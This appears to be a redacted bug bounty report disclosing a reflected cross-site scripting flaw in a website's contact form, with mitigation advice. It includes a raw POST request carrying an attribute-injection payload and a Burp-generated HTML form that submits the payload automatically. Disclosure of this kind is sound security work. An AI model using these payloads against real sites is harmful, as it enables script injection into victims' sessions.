RXSS on ███████

I found Reflected XSS on https://███/contact-us/#.YsSAGCNBzaQ. The parameters in the contact form are not properly filtered, leading to possible insertion of `"` characters and javascript execution ## Impact Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user. ## System Host(s) ███████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce 1. Use this code in your BurpSuite Repeater. ``` POST /contact-us/ HTTP/1.1 Host: ███████ Cookie: wire=kh92hb67grih1376an7igoeo39; _ga_877MBKEB9K=GS1.1.1657044258.1.1.1657044351.0; _ga=GA1.2.58467857.1657044259; __atuvc=2%7C27; __atuvs=62c47d237cd3f8d9001; __atrfs=ab/|pos/|tot/|rsi/62c47d0400000000|cfc/|hash/0|rsiq/|fuid/d2cfdda4|rxi/|rsc/addressbar|gen/1|csi/|dr/; _gid=GA1.2.2089900381.1657044260; wires=cqr7lhfhfudpdntime6mevkslt; _gat_gtag_UA_377760_26=1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 142 Origin: https://██████ Referer: https://████████/contact-us/ Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close name="%20onfocus=alert('tmz900')%20autofocus//"&email=test%40gmail.com&phone=1234567895&message=test&submitted=submitted&g-recaptcha-response= ``` 2. You will see an alert box pop up: █████████ 3. Or you can use this code test on html file: ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://████/contact-us/" method="POST"> <input type="hidden" name="name" value="&quot;&#32;onfocus&#61;alert&#40;&apos;tmz900&apos;&#41;&#32;autofocus&#47;&#47;&quot;" /> <input type="hidden" name="email" value="test&#64;gmail&#46;com" /> <input type="hidden" name="phone" value="1234567895" /> <input type="hidden" name="message" value="test" /> <input type="hidden" name="submitted" value="submitted" /> <input type="hidden" name="g&#45;recaptcha&#45;response" value="" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` ## Suggested Mitigation/Remediation Actions Filter input on arrival Encode data on output Use appropriate response headers Content Security Policy.